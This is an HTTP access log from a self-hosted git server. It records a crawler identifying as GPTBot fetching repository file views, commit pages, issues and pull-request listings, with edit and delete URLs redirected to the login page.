[Length 11535] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 9906] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10475] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11366] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 1049] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 9907] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13403] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:19:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 14168] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16286] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11375] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11549] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:41:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:19:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:19:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 11098] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:19:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fwarn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 18956] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fwarn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 20576] [Gzip 4.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:19:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:19:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:42:08 +0000] - 303 